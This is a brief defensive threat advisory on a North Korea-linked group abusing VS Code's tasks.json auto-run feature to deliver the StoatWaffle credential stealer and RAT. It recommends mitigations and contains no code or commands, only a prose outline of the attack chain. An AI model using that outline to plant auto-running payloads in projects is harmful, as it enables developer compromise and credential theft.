North Korean APT Team 8 Leverages VS Code Auto‑Run Tasks to Deploy StoatWaffle Malware
What Happened — Team 8, a North Korea‑linked APT, has been abusing the tasks.json auto‑run feature in Microsoft Visual Studio Code projects to silently download and execute the StoatWaffle malware suite. The malicious repositories appear legitimate (often posing as blockchain‑related projects) and trigger payloads whenever a folder is opened in VS Code.
Why It Matters for TPRM —
- The technique runs inside a trusted developer tool, evading many endpoint protections.
- It can compromise Windows, macOS, and Linux workstations, stealing browser credentials, extension data, and macOS Keychain entries.
- Supply‑chain infection via public code repositories expands the attack surface for any organization that allows developers to pull external VS Code projects.
Who Is Affected — Software development teams, SaaS platforms hosting code repositories, and any enterprise that permits VS Code usage on employee workstations.
Recommended Actions —
- Disable or tightly control VS Code’s auto‑run tasks; require manual review of
.vscode/tasks.jsonfiles from untrusted sources. - Enforce application‑allowlisting for VS Code and Node.js runtimes.
- Deploy monitoring for anomalous outbound traffic to known C2 domains and for credential‑theft indicators on developer machines.
- Conduct security awareness training focused on the risks of opening unverified VS Code projects.
Technical Notes — The attacker places a malicious tasks.json that launches a downloader from Vercel, installs Node.js if missing, and runs a multi‑stage loader. Modules include a credential stealer (browsers, extensions, macOS Keychain, WSL) and a RAT for remote command execution. Source: Security Affairs